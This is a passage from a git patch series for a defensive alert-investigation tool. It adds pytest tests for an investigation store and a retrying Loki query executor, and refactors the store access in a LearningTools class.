InvestigationStore) -> None: + """Test updating effectiveness for an existing query.""" + # Add initial record + for _ in range(3): + store.update_query_effectiveness( + query_pattern="{job='existing'}", + successful=True, + produced_evidence=False, + alert_type="AlertA", + ) + + # Update with evidence + store.update_query_effectiveness( + query_pattern="{job='existing'}", + successful=True, + produced_evidence=True, + alert_type="AlertB", + ) + + effective = store.get_effective_queries(min_evidence_rate=0.0, limit=10) + matching = [q for q in effective if q.query_pattern == "{job='existing'}"] + + assert len(matching) == 1 + assert matching[0].total_executions == 4 + assert matching[0].evidence_producing == 1 + assert "AlertA" in matching[0].alert_types + assert "AlertB" in matching[0].alert_types + + def test_get_effective_queries_filtered_by_alert_type(self, store: InvestigationStore) -> None: + """Test getting effective queries filtered by alert type.""" + # Add queries for different alert types + for _ in range(3): + store.update_query_effectiveness( + query_pattern="{job='alert_a'}", + successful=True, + produced_evidence=True, + alert_type="AlertA", + ) + store.update_query_effectiveness( + query_pattern="{job='alert_b'}", + successful=True, + produced_evidence=True, + alert_type="AlertB", + ) + + effective_a = store.get_effective_queries(alert_type="AlertA", min_evidence_rate=0.0) + effective_b = store.get_effective_queries(alert_type="AlertB", min_evidence_rate=0.0) + + assert len(effective_a) == 1 + assert effective_a[0].query_pattern == "{job='alert_a'}" + assert len(effective_b) == 1 + assert effective_b[0].query_pattern == "{job='alert_b'}" + + def test_get_statistics( + self, store: InvestigationStore, sample_investigation: StoredInvestigation + ) -> None: + """Test getting overall statistics.""" + store.store_investigation(sample_investigation) + + stats = store.get_statistics() + + assert stats["total_investigations"] == 1 + assert "completed" in 
stats["status_distribution"] + assert stats["avg_evidence_count"] == 5.0 + assert stats["labeling"]["true_positives"] == 1 + assert stats["labeling"]["false_positives"] == 0 + + def test_get_statistics_empty_store(self, store: InvestigationStore) -> None: + """Test getting statistics from empty store.""" + stats = store.get_statistics() + + assert stats["total_investigations"] == 0 + assert stats["avg_evidence_count"] == 0 + assert stats["labeling"]["true_positives"] == 0 + + def test_label_investigation( + self, store: InvestigationStore, sample_investigation: StoredInvestigation + ) -> None: + """Test labeling an investigation.""" + sample_investigation.is_true_positive = None + store.store_investigation(sample_investigation) + + # Label as false positive + result = store.label_investigation( + investigation_id=sample_investigation.investigation_id, + is_true_positive=False, + analyst_notes="Benign activity", + ) + + assert result is True + + retrieved = store.get_investigation(sample_investigation.investigation_id) + assert retrieved is not None + assert retrieved.is_true_positive is False + assert retrieved.analyst_notes == "Benign activity" + + def test_label_nonexistent_investigation(self, store: InvestigationStore) -> None: + """Test labeling a non-existent investigation.""" + result = store.label_investigation( + investigation_id="nonexistent", + is_true_positive=True, + ) + + assert result is False + + def test_get_false_positive_patterns(self, store: InvestigationStore) -> None: + """Test getting false positive patterns.""" + now = datetime.now(timezone.utc) + + # Create multiple false positive investigations with same fingerprint + for i in range(5): + inv = StoredInvestigation( + investigation_id=f"fp-inv-{i}", + alert_name="NoisyAlert", + alert_fingerprint="noisy-rule-001", + severity="low", + technique_id="T1000", + technique_name="Test", + started_at=now - timedelta(minutes=10), + completed_at=now, + duration_seconds=60.0, + status="completed", + 
evidence_count=0, + highest_pyramid_level=0, + techniques_identified=[], + queries_executed=[], + query_success_rate=0.0, + effective_queries=[], + is_true_positive=False, + ) + store.store_investigation(inv) + + patterns = store.get_false_positive_patterns(min_occurrences=3) + + assert len(patterns) >= 1 + noisy_pattern = next((p for p in patterns if p["alert_name"] == "NoisyAlert"), None) + assert noisy_pattern is not None + assert noisy_pattern["occurrences"] >= 3 + + +class TestGlobalStore: + """Tests for global store functions.""" + + def test_get_investigation_store_creates_default(self) -> None: + """Test that get_investigation_store creates a default store.""" + reset_investigation_store() + + with tempfile.TemporaryDirectory() as tmpdir: + db_path = Path(tmpdir) / "test.db" + store = get_investigation_store(db_path) + + assert store is not None + assert store.db_path == db_path + + reset_investigation_store() + + def test_get_investigation_store_returns_same_instance(self) -> None: + """Test that get_investigation_store returns the same instance.""" + reset_investigation_store() + + with tempfile.TemporaryDirectory() as tmpdir: + db_path = Path(tmpdir) / "test.db" + store1 = get_investigation_store(db_path) + store2 = get_investigation_store() + + assert store1 is store2 + + reset_investigation_store() + + def test_reset_investigation_store(self) -> None: + """Test resetting the global store.""" + reset_investigation_store() + + with tempfile.TemporaryDirectory() as tmpdir: + db_path = Path(tmpdir) / "test.db" + store1 = get_investigation_store(db_path) + reset_investigation_store() + + # After reset, a new call should create new instance + store2 = get_investigation_store(db_path) + + assert store1 is not store2 + + reset_investigation_store() + + +class TestSimilarityScoring: + """Tests for similarity calculation.""" + + def test_similarity_score_all_factors( + self, store: InvestigationStore, sample_investigation: StoredInvestigation + ) -> None: + 
"""Test similarity score with all matching factors.""" + store.store_investigation(sample_investigation) + + similar = store.find_similar_investigations( + alert_name=sample_investigation.alert_name, + alert_fingerprint=sample_investigation.alert_fingerprint, + technique_id=sample_investigation.technique_id, + severity=sample_investigation.severity, + ) + + assert len(similar) == 1 + # 0.5 (fingerprint) + 0.3 (name) + 0.15 (technique) + 0.05 (severity) = 1.0 + assert similar[0].similarity_score == 1.0 + assert len(similar[0].matching_factors) == 4 + + def test_similarity_score_partial_match( + self, store: InvestigationStore, sample_investigation: StoredInvestigation + ) -> None: + """Test similarity score with partial match.""" + store.store_investigation(sample_investigation) + + similar = store.find_similar_investigations( + technique_id=sample_investigation.technique_id, + ) + + assert len(similar) == 1 + assert similar[0].similarity_score == 0.15 + assert similar[0].matching_factors == ["same_technique"] diff --git a/tests/test_query_resilience.py b/tests/test_query_resilience.py new file mode 100644 index 00000000..2bd12438 --- /dev/null +++ b/tests/test_query_resilience.py @@ -0,0 +1,516 @@ +"""Tests for the Query Resilience module.""" + +import asyncio +from typing import Any +from unittest.mock import AsyncMock + +import pytest + +from ares.core.query_resilience import ( + QueryAttempt, + QueryResilientExecutor, + QueryStats, + get_resilient_executor, + reset_resilient_executor, +) + + +class TestQueryAttempt: + """Tests for QueryAttempt dataclass.""" + + def test_create_successful_attempt(self) -> None: + """Test creating a successful query attempt.""" + attempt = QueryAttempt( + query="{job='test'}", + start_time="2024-01-15T10:00:00Z", + end_time="2024-01-15T11:00:00Z", + attempt_number=1, + success=True, + result_count=100, + duration_ms=500, + ) + + assert attempt.success is True + assert attempt.error is None + assert attempt.result_count == 100 + + 
def test_create_failed_attempt(self) -> None: + """Test creating a failed query attempt.""" + attempt = QueryAttempt( + query="{job='test'}", + start_time="2024-01-15T10:00:00Z", + end_time="2024-01-15T11:00:00Z", + attempt_number=2, + success=False, + error="Timeout after 30s", + duration_ms=30000, + ) + + assert attempt.success is False + assert attempt.error == "Timeout after 30s" + assert attempt.result_count == 0 + + +class TestQueryStats: + """Tests for QueryStats dataclass.""" + + def test_default_values(self) -> None: + """Test default values for QueryStats.""" + stats = QueryStats() + + assert stats.total_attempts == 0 + assert stats.successful_attempts == 0 + assert stats.timeout_count == 0 + assert stats.retry_count == 0 + assert stats.time_range_reductions == 0 + assert stats.attempts == [] + + def test_success_rate_calculation(self) -> None: + """Test success rate calculation.""" + stats = QueryStats(total_attempts=10, successful_attempts=7) + + assert stats.success_rate == 0.7 + + def test_success_rate_zero_attempts(self) -> None: + """Test success rate with zero attempts.""" + stats = QueryStats(total_attempts=0, successful_attempts=0) + + assert stats.success_rate == 0.0 + + +class TestQueryResilientExecutor: + """Tests for QueryResilientExecutor.""" + + def test_init_default_values(self) -> None: + """Test default initialization values.""" + executor = QueryResilientExecutor() + + assert executor.max_retries == 3 + assert executor.initial_timeout == 30.0 + assert executor.enable_chunking is True + assert executor.chunk_size_minutes == 30 + + def test_init_custom_values(self) -> None: + """Test initialization with custom values.""" + executor = QueryResilientExecutor( + max_retries=5, + initial_timeout=60.0, + enable_chunking=False, + chunk_size_minutes=15, + ) + + assert executor.max_retries == 5 + assert executor.initial_timeout == 60.0 + assert executor.enable_chunking is False + assert executor.chunk_size_minutes == 15 + + @pytest.mark.asyncio + 
async def test_execute_with_resilience_success(self) -> None: + """Test successful query execution.""" + executor = QueryResilientExecutor() + + mock_query_fn = AsyncMock( + return_value={ + "status": "success", + "data": {"result": [{"values": [[1, "log1"], [2, "log2"]]}]}, + } + ) + + result = await executor.execute_with_resilience( + query_fn=mock_query_fn, + query="{job='test'}", + start_time="2024-01-15T10:00:00Z", + end_time="2024-01-15T11:00:00Z", + ) + + assert result["status"] == "success" + assert "_resilience_metadata" in result + assert result["_resilience_metadata"]["retry_count"] == 0 + assert executor.stats.successful_attempts == 1 + + @pytest.mark.asyncio + async def test_execute_with_resilience_timeout_retry(self) -> None: + """Test retry behavior on timeout.""" + executor = QueryResilientExecutor(max_retries=2, initial_timeout=0.1) + + call_count = 0 + + async def timeout_then_success(**kwargs: Any) -> dict[str, Any]: + nonlocal call_count + call_count += 1 + if call_count < 2: + await asyncio.sleep(1) # Will timeout + return {"status": "success", "data": {"result": []}} + + mock_query_fn = AsyncMock(side_effect=timeout_then_success) + + result = await executor.execute_with_resilience( + query_fn=mock_query_fn, + query="{job='test'}", + start_time="2024-01-15T10:00:00Z", + end_time="2024-01-15T10:30:00Z", + ) + + assert result["status"] == "success" + assert executor.stats.timeout_count >= 1 + + @pytest.mark.asyncio + async def test_execute_with_resilience_all_retries_fail(self) -> None: + """Test behavior when all retries fail.""" + executor = QueryResilientExecutor(max_retries=2, initial_timeout=0.1) + + async def always_timeout(**kwargs: Any) -> dict[str, Any]: + await asyncio.sleep(1) # Always timeout + return {"status": "success", "data": {"result": []}} + + mock_query_fn = AsyncMock(side_effect=always_timeout) + + result = await executor.execute_with_resilience( + query_fn=mock_query_fn, + query="{job='test'}", + 
start_time="2024-01-15T10:00:00Z", + end_time="2024-01-15T10:30:00Z", + ) + + assert result["status"] == "error" + assert "suggestion" in result + assert executor.stats.timeout_count > 0 + + @pytest.mark.asyncio + async def test_execute_with_resilience_error_response(self) -> None: + """Test handling of error responses from query function.""" + executor = QueryResilientExecutor(max_retries=2) + + mock_query_fn = AsyncMock( + return_value={ + "status": "error", + "error": "timeout exceeded while executing query", + } + ) + + await executor.execute_with_resilience( + query_fn=mock_query_fn, + query="{job='test'}", + start_time="2024-01-15T10:00:00Z", + end_time="2024-01-15T10:30:00Z", + ) + + # Should retry on timeout errors + assert executor.stats.timeout_count > 0 + + @pytest.mark.asyncio + async def test_execute_with_resilience_time_range_reduction(self) -> None: + """Test time range reduction on persistent failures.""" + executor = QueryResilientExecutor(max_retries=1, initial_timeout=0.05) + + call_count = 0 + received_time_ranges: list[tuple[str, str]] = [] + + async def track_time_ranges(**kwargs: Any) -> dict[str, Any]: + nonlocal call_count + call_count += 1 + received_time_ranges.append((kwargs.get("start_time", ""), kwargs.get("end_time", ""))) + + # Fail first few, succeed later with smaller range + if call_count < 3: + await asyncio.sleep(1) # Timeout + return {"status": "success", "data": {"result": []}} + + mock_query_fn = AsyncMock(side_effect=track_time_ranges) + + await executor.execute_with_resilience( + query_fn=mock_query_fn, + query="{job='test'}", + start_time="2024-01-15T10:00:00Z", + end_time="2024-01-15T11:00:00Z", + ) + + # Should have reduced time range at some point + assert executor.stats.time_range_reductions > 0 + + @pytest.mark.asyncio + async def test_execute_chunked_for_large_range(self) -> None: + """Test that large time ranges trigger chunked execution.""" + executor = QueryResilientExecutor(chunk_size_minutes=30) + + call_times: 
list[str] = [] + + async def track_chunks(**kwargs: Any) -> dict[str, Any]: + call_times.append(kwargs.get("start_time", "")) + return {"status": "success", "data": {"result": [{"values": [[1, "log"]]}]}} + + mock_query_fn = AsyncMock(side_effect=track_chunks) + + # 3 hour range should trigger chunking + result = await executor.execute_with_resilience( + query_fn=mock_query_fn, + query="{job='test'}", + start_time="2024-01-15T10:00:00Z", + end_time="2024-01-15T13:00:00Z", + ) + + # Should have made multiple chunk calls (3 hours / 30 min = 6 chunks) + assert len(call_times) >= 4 + assert "_chunked_execution" in result + + @pytest.mark.asyncio + async def test_execute_chunked_disabled(self) -> None: + """Test that chunking can be disabled.""" + executor = QueryResilientExecutor(enable_chunking=False) + + call_count = 0 + + async def count_calls(**kwargs: Any) -> dict[str, Any]: + nonlocal call_count + call_count += 1 + return {"status": "success", "data": {"result": []}} + + mock_query_fn = AsyncMock(side_effect=count_calls) + + # 3 hour range but chunking disabled + await executor.execute_with_resilience( + query_fn=mock_query_fn, + query="{job='test'}", + start_time="2024-01-15T10:00:00Z", + end_time="2024-01-15T13:00:00Z", + ) + + # Should have made only one call (not chunked) + assert call_count == 1 + + @pytest.mark.asyncio + async def test_execute_chunked_merge_results(self) -> None: + """Test that chunked results are properly merged.""" + executor = QueryResilientExecutor(chunk_size_minutes=30) + + chunk_num = 0 + + async def return_chunk_results(**kwargs: Any) -> dict[str, Any]: + nonlocal chunk_num + chunk_num += 1 + return { + "status": "success", + "data": {"result": [{"stream": {}, "values": [[chunk_num, f"log{chunk_num}"]]}]}, + } + + mock_query_fn = AsyncMock(side_effect=return_chunk_results) + + # Range > 2 hours triggers chunking (chunking threshold is > 2h) + result = await executor.execute_with_resilience( + query_fn=mock_query_fn, + 
query="{job='test'}", + start_time="2024-01-15T10:00:00Z", + end_time="2024-01-15T13:00:00Z", # 3 hours = 6 chunks + ) + + # Results should be merged (6 chunks for 3 hours / 30 min) + assert "data" in result + assert len(result["data"]["result"]) >= 2 + + def test_count_results_list(self) -> None: + """Test counting results from a list.""" + executor = QueryResilientExecutor() + + result = [1, 2, 3, 4, 5] + count = executor._count_results(result) + + assert count == 5 + + def test_count_results_dict_with_streams(self) -> None: + """Test counting results from Loki-style response.""" + executor = QueryResilientExecutor() + + result = { + "data": { + "result": [ + {"stream": {}, "values": [[1, "a"], [2, "b"]]}, + {"stream": {}, "values": [[3, "c"]]}, + ] + } + } + count = executor._count_results(result) + + assert count == 3 # 2 + 1 values + + def test_count_results_empty(self) -> None: + """Test counting results from empty response.""" + executor = QueryResilientExecutor() + + assert executor._count_results({}) == 0 + assert executor._count_results({"data": {}}) == 0 + assert executor._count_results({"data": {"result": []}}) == 0 + + def test_get_stats_summary(self) -> None: + """Test getting stats summary.""" + executor = QueryResilientExecutor() + executor.stats.total_attempts = 10 + executor.stats.successful_attempts = 8 + executor.stats.timeout_count = 2 + executor.stats.retry_count = 3 + executor.stats.time_range_reductions = 1 + + summary = executor.get_stats_summary() + + assert summary["total_attempts"] == 10 + assert summary["successful_attempts"] == 8 + assert summary["success_rate"] == "80.0%" + assert summary["timeout_count"] == 2 + assert summary["retry_count"] == 3 + assert summary["time_range_reductions"] == 1 + + def test_merge_chunk_results_empty(self) -> None: + """Test merging empty chunk results.""" + executor = QueryResilientExecutor() + + result = executor._merge_chunk_results([]) + + assert result["status"] == "success" + assert 
result["data"]["result"] == [] + + def test_merge_chunk_results_multiple(self) -> None: + """Test merging multiple chunk results.""" + executor = QueryResilientExecutor() + + chunks = [ + {"data": {"result": [{"stream": "a", "values": [1, 2]}]}}, + {"data": {"result": [{"stream": "b", "values": [3, 4]}]}}, + {"data": {"result": [{"stream": "c", "values": [5]}]}}, + ] + + result = executor._merge_chunk_results(chunks) + + assert result["status"] == "success" + assert len(result["data"]["result"]) == 3 + + +class TestGlobalExecutor: + """Tests for global executor functions.""" + + def test_get_resilient_executor_creates_default(self) -> None: + """Test that get_resilient_executor creates a default instance.""" + reset_resilient_executor() + + executor = get_resilient_executor() + + assert executor is not None + assert isinstance(executor, QueryResilientExecutor) + + reset_resilient_executor() + + def test_get_resilient_executor_returns_same_instance(self) -> None: + """Test that get_resilient_executor returns the same instance.""" + reset_resilient_executor() + + executor1 = get_resilient_executor() + executor2 = get_resilient_executor() + + assert executor1 is executor2 + + reset_resilient_executor() + + def test_reset_resilient_executor(self) -> None: + """Test resetting the global executor.""" + reset_resilient_executor() + + executor1 = get_resilient_executor() + reset_resilient_executor() + executor2 = get_resilient_executor() + + assert executor1 is not executor2 + + reset_resilient_executor() + + +class TestTimeRangeFactors: + """Tests for time range reduction factors.""" + + def test_time_range_factors_order(self) -> None: + """Test that time range factors are in descending order.""" + factors = QueryResilientExecutor.TIME_RANGE_FACTORS + + assert factors == sorted(factors, reverse=True) + assert factors[0] == 1.0 # Start with full range + assert factors[-1] < 0.5 # End with small range + + def test_backoff_delays_order(self) -> None: + """Test that backoff 
delays are in ascending order.""" + delays = QueryResilientExecutor.BACKOFF_DELAYS + + assert delays == sorted(delays) + assert delays[0] >= 1 # At least 1 second + + +class TestEdgeCases: + """Tests for edge cases.""" + + @pytest.mark.asyncio + async def test_execute_with_z_suffix_timestamps(self) -> None: + """Test handling of Z suffix in timestamps.""" + executor = QueryResilientExecutor() + + mock_query_fn = AsyncMock(return_value={"status": "success", "data": {"result": []}}) + + result = await executor.execute_with_resilience( + query_fn=mock_query_fn, + query="{job='test'}", + start_time="2024-01-15T10:00:00Z", + end_time="2024-01-15T11:00:00Z", + ) + + assert result["status"] == "success" + + @pytest.mark.asyncio + async def test_execute_with_offset_timestamps(self) -> None: + """Test handling of offset timestamps.""" + executor = QueryResilientExecutor() + + mock_query_fn = AsyncMock(return_value={"status": "success", "data": {"result": []}}) + + result = await executor.execute_with_resilience( + query_fn=mock_query_fn, + query="{job='test'}", + start_time="2024-01-15T10:00:00+00:00", + end_time="2024-01-15T11:00:00+00:00", + ) + + assert result["status"] == "success" + + @pytest.mark.asyncio + async def test_execute_with_grpc_error(self) -> None: + """Test handling of gRPC errors.""" + executor = QueryResilientExecutor(max_retries=3) + + mock_query_fn = AsyncMock(side_effect=Exception("grpc: connection failed")) + + result = await executor.execute_with_resilience( + query_fn=mock_query_fn, + query="{job='test'}", + start_time="2024-01-15T10:00:00Z", + end_time="2024-01-15T10:30:00Z", + ) + + # Should give up on gRPC errors and move to next time range factor + assert result["status"] == "error" + + @pytest.mark.asyncio + async def test_execute_with_non_timeout_error_response(self) -> None: + """Test handling of non-timeout error responses.""" + executor = QueryResilientExecutor() + + mock_query_fn = AsyncMock( + return_value={ + "status": "error", + 
"error": "invalid query syntax", + } + ) + + await executor.execute_with_resilience( + query_fn=mock_query_fn, + query="{job='test'}", + start_time="2024-01-15T10:00:00Z", + end_time="2024-01-15T10:30:00Z", + ) + + # Non-timeout errors should be returned (not retried indefinitely) + # The result might still have metadata + assert executor.stats.timeout_count == 0 From 628b46884bb80c9d8547967a78b03ab4f8726d85 Mon Sep 17 00:00:00 2001 From: Jayson Grace Date: Sat, 10 Jan 2026 18:06:30 -0700 Subject: [PATCH 5/5] refactor: simplify LearningTools store handling and update tests **Changed:** - Refactored LearningTools to use a public `store` attribute instead of a private `_store` with property logic, simplifying initialization and access - Replaced all direct store accesses with a `get_store()` method to ensure store is initialized when needed - Updated tests to use the public `store` attribute and `get_store()` method, reflecting the new initialization and access pattern - Improved class and attribute documentation for clarity --- src/ares/tools/blue/learning.py | 32 ++++++++++++++------------------ tests/test_learning.py | 12 ++++++------ 2 files changed, 20 insertions(+), 24 deletions(-) diff --git a/src/ares/tools/blue/learning.py b/src/ares/tools/blue/learning.py index 38a8fb40..accc04d9 100644 --- a/src/ares/tools/blue/learning.py +++ b/src/ares/tools/blue/learning.py @@ -19,22 +19,18 @@ class LearningTools(Toolset): # type: ignore[misc] Provides access to historical investigation data, query effectiveness statistics, and false positive patterns. - """ - def __init__(self, store: InvestigationStore | None = None): - """Initialize learning tools. + Attributes: + store: Optional investigation store (uses global store if not provided). 
+ """ - Args: - store: Optional investigation store (uses global store if not provided) - """ - self._store = store + store: InvestigationStore | None = None - @property - def store(self) -> InvestigationStore: - """Get the investigation store.""" - if self._store is None: - self._store = get_investigation_store() - return self._store + def get_store(self) -> InvestigationStore: + """Get the investigation store, initializing if needed.""" + if self.store is None: + self.store = get_investigation_store() + return self.store @dn.tool_method # type: ignore[untyped-decorator] async def find_similar_investigations( @@ -63,7 +59,7 @@ async def find_similar_investigations( f"Looking up similar investigations: alert={alert_name}, technique={technique_id}" ) - similar = self.store.find_similar_investigations( + similar = self.get_store().find_similar_investigations( alert_name=alert_name, technique_id=technique_id, severity=severity, @@ -140,7 +136,7 @@ async def get_effective_queries( dn.log_metric("learning_query_lookup", 1, mode="count") logger.info(f"Looking up effective queries for alert: {alert_name}") - effective = self.store.get_effective_queries( + effective = self.get_store().get_effective_queries( alert_type=alert_name, min_evidence_rate=0.2, # At least 20% evidence rate limit=limit, @@ -198,7 +194,7 @@ async def check_false_positive_pattern( logger.info(f"Checking false positive patterns for: {alert_name}") # Check for similar false positives - similar = self.store.find_similar_investigations( + similar = self.get_store().find_similar_investigations( alert_name=alert_name, alert_fingerprint=alert_fingerprint, limit=20, @@ -223,7 +219,7 @@ async def check_false_positive_pattern( fp_rate = 0.0 # Check known FP patterns - fp_patterns = self.store.get_false_positive_patterns(min_occurrences=2) + fp_patterns = self.get_store().get_false_positive_patterns(min_occurrences=2) matching_pattern = None for pattern in fp_patterns: if pattern["alert_name"] == alert_name: @@ 
-278,7 +274,7 @@ async def get_investigation_statistics(self) -> dict[str, Any]: """ dn.log_metric("learning_stats_lookup", 1, mode="count") - stats = self.store.get_statistics() + stats = self.get_store().get_statistics() return { "total_investigations": stats["total_investigations"], diff --git a/tests/test_learning.py b/tests/test_learning.py index f515ed6a..7262e8e4 100644 --- a/tests/test_learning.py +++ b/tests/test_learning.py @@ -115,21 +115,21 @@ def test_init_with_store(self, store: InvestigationStore) -> None: """Test initialization with provided store.""" tools = LearningTools(store=store) - assert tools._store is store + assert tools.store is store def test_init_without_store(self) -> None: """Test initialization without store uses global.""" tools = LearningTools() - assert tools._store is None - # Accessing store property should get/create global store + assert tools.store is None + # Accessing get_store() should get/create global store # (but we won't test that to avoid side effects) - def test_store_property_returns_provided_store(self, store: InvestigationStore) -> None: - """Test that store property returns provided store.""" + def test_get_store_returns_provided_store(self, store: InvestigationStore) -> None: + """Test that get_store() returns provided store.""" tools = LearningTools(store=store) - assert tools.store is store + assert tools.get_store() is store class TestFindSimilarInvestigations: